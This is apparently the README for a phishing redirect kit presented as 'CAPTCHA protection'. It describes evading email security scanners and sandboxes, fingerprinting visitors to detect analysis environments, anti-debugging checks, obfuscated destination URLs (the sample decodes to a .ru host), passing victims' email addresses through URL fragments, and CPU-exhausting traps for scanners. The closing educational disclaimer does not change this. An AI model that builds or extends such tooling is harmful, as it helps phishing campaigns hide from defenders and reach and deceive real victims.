# Enhanced CAPTCHA Redirect Protection

This enhanced CAPTCHA implementation provides multiple layers of security to prevent automated scanners, bots, and security tools from analyzing your redirect links, while maintaining a simple, non-suspicious user experience.

## Key Enhanced Features

1. **Single Visible Verification**
   - Standard Google reCAPTCHA integration as the only visible challenge
   - Hidden security measures that run silently in the background
   - Clean, professional user interface

2. **Advanced Bot Detection (Hidden)**
   - Mouse movement pattern analysis
   - Keyboard interaction tracking
   - Multiple honey pot form fields with randomized names
   - Headless browser detection
   - WebDriver detection
   - Sandbox environment detection

3. **Blacklist System**
   - Known bot user-agent detection and blocking
   - Email security scanner identification
   - Automatic blacklisting of suspicious visitors
   - Client fingerprint-based tracking
   - Configurable blacklist duration and thresholds

4. **Bot Trap System**
   - Fake "site under construction" pages shown to detected bots
   - Infinite loop CPU/memory trap for automated scanners
   - Deceptive loading screens that never complete
   - Multiple trap templates to appear legitimate
   - Automatic activation for suspicious visitors

5. **URL Fragment Handling (New)**
   - Automatic transfer of URL fragments (#parameters) through redirects
   - Secure sanitization of user identifiers and tracking codes
   - Preserves email addresses and tracking parameters
   - Session-based backup to recover fragments if browsers strip them
   - Compatible with existing analytics and affiliate systems

6. **Browser Fingerprinting (Silent)**
   - Canvas-based fingerprinting
   - WebGL information detection
   - Font detection
   - Audio/video codec support detection
   - WebRTC capabilities detection
   - Performance benchmarking
   - Plugins enumeration

7. **Secure Token Handling**
   - WebCrypto API for secure token generation
   - Token expiration logic
   - LocalStorage verification
   - Timestamp validation

8. **URL Protection**
   - Dynamic URL assembly at runtime
   - Character code obfuscation
   - Base64 encoding with character manipulation
   - URL fragments stored separately

9. **Anti-Debugging Measures**
   - DevTools detection
   - Debugger statement detection
   - Console access detection
   - DOM manipulation detection

## Implementation Details

The solution is structured in modular components:

- `index.html` - The main entry point with challenge UI
- `/css/styles.css` - Styling for the CAPTCHA interface
- `/js/utils.js` - Utility functions, URL obfuscation, blacklist system, bot trap, and fragment handling
- `/js/fingerprint.js` - Advanced browser fingerprinting module
- `/js/captcha.js` - CAPTCHA verification and challenge handling
- `/js/redirect.js` - Secure redirect mechanism

## Advantages Over Original Implementation

1. Much stronger protection against automated analysis tools
2. Clean, non-suspicious user interface with only a single visible challenge
3. Better URL obfuscation to prevent static code analysis
4. Sophisticated bot detection running silently in the background
5. Enhanced fingerprinting to detect security/analysis environments
6. Token-based verification with expiration
7. Multiple honeypot fields with dynamic naming
8. Automatic blocking and blacklisting of suspicious visitors
9. Deceptive bot traps that waste attacker resources
10. Preserves URL fragments for tracking and user identification

## Usage

1. Replace the reCAPTCHA site key with your actual key in the HTML
2. Update the obfuscated URL in `js/utils.js` with your target URL (see instructions below)
3. Customize blacklist settings if needed (default is 3 failed attempts = 24h blacklist)
4. Deploy all files to your server
5. Optionally, add server-side validation for even stronger protection

### Using URL Fragments for Tracking and Identification

The system now supports automatically transferring URL fragments from the CAPTCHA page to the destination URL. This is useful for:

1. **Email Campaign Tracking**: Add email addresses or user IDs as fragments
   ```
   https://your-captcha-page.com#user@example.com
   ```

2. **Affiliate/Referral Tracking**: Include referral or affiliate codes
   ```
   https://your-captcha-page.com#ref123
   ```

3. **Analytics Parameters**: Add custom tracking parameters
   ```
   https://your-captcha-page.com#utm_source=email
   ```

The fragment will be automatically appended to the final destination URL after verification. For example, if a user visits `https://your-captcha-page.com#user@example.com` and passes verification, they will be redirected to `https://destination-url.com#user@example.com`.

The system includes:
- Sanitization to prevent XSS attacks
- Validation of common formats like email addresses
- Session-based backup mechanism for browsers that strip fragments
- Compatible with analytics systems that read URL fragments

### Changing the Redirect URL

The redirect URL is obfuscated and split into three parts for enhanced security. To change it:

1. Open `js/utils.js`
2. Locate the `_u` object near the top of the file (around line 8-12):
   ```javascript
   const _u = {
       p: "h" + String.fromCharCode(116) + String.fromCharCode(116) + "p" + "s:",  // Protocol
       h: atob("Ly9zYnEuY29kZXNwaHNlcmUucnUv"),  // Domain/host
       e: btoa("ZhZW/").split("").reverse().join("")  // Endpoint/path
   };
   ```
3. Modify each part of your URL:
   - For the protocol: Update the `p` property (currently "https:")
   - For the domain: Replace the base64-encoded string in the `h` property
   - For the path/endpoint: Change the base64-encoded and reversed string in the `e` property

4. To encode your new domain and path:
   - Protocol: You can use character codes for obfuscation:
     ```javascript
     // Example for "https:"
     "h" + String.fromCharCode(116) + String.fromCharCode(116) + "p" + "s:"
     ```
   - Domain: Use base64 encoding:
     ```javascript
     // Remember to include the slashes
     atob("Ly95b3VyZG9tYWluLmNvbS8=")  // Decodes to "//yourdomain.com/"
     ```
   - Path: Use base64 encoding and string reversal:
     ```javascript
     btoa("your-path").split("").reverse().join("")
     ```

### Customizing Bot Trap Templates

The bot trap system uses templated "under construction" pages to deceive bots. You can customize these in the `botTrapSystem` object in `utils.js`:

1. Each template is defined in the `constructionTemplates` array
2. You can modify existing templates or add new ones
3. Customize the appearance, messages, and behavior
4. The system will randomly choose a template when activated

The trap includes:

- Professional-looking maintenance pages
- Infinite loop CPU/memory consumption when interacted with
- Fake loading screens that never complete
- Random delays before activation (30-120 seconds)
- Bot activity logging for future analysis

### Customizing Blacklist Settings

The blacklist system can be customized by modifying the settings in `js/utils.js`:

1. Look for the `blacklistSystem` object and its `thresholds` property:
   ```javascript
   thresholds: {
       maxFailedAttempts: 3,       // Auto-blacklist after N failed attempts
       blacklistDuration: 86400    // Blacklist duration in seconds (24 hours)
   }
   ```

2. Adjust the values as needed:
   - `maxFailedAttempts`: Number of failed verification attempts before blacklisting
   - `blacklistDuration`: How long the blacklist remains active (in seconds)

3. You can also customize the bot signatures and security tool lists:
   - `knownBotSignatures`: Array of bot user-agent strings to block
   - `securityTools`: Array of security scanner signatures to block

## Compatibility

This solution works in modern browsers (Chrome, Firefox, Safari, Edge) and requires JavaScript to be enabled. It intentionally blocks headless browsers and automation tools used by security scanners.

## Deployment

This solution can be hosted on any standard web server or hosting platform:

1. **cPanel**: Upload all files to your hosting account via File Manager or FTP
2. **Netlify/Vercel**: Deploy directly from a GitHub repository
3. **AWS S3/CloudFront**: Host as a static website with CloudFront distribution
4. **GitHub Pages**: Host directly from a GitHub repository

No server-side code is required as all security measures run in the browser.

## Disclaimer

This implementation is designed for educational purposes to demonstrate advanced anti-bot techniques. Ensure compliance with all applicable laws and terms of service for any services used. 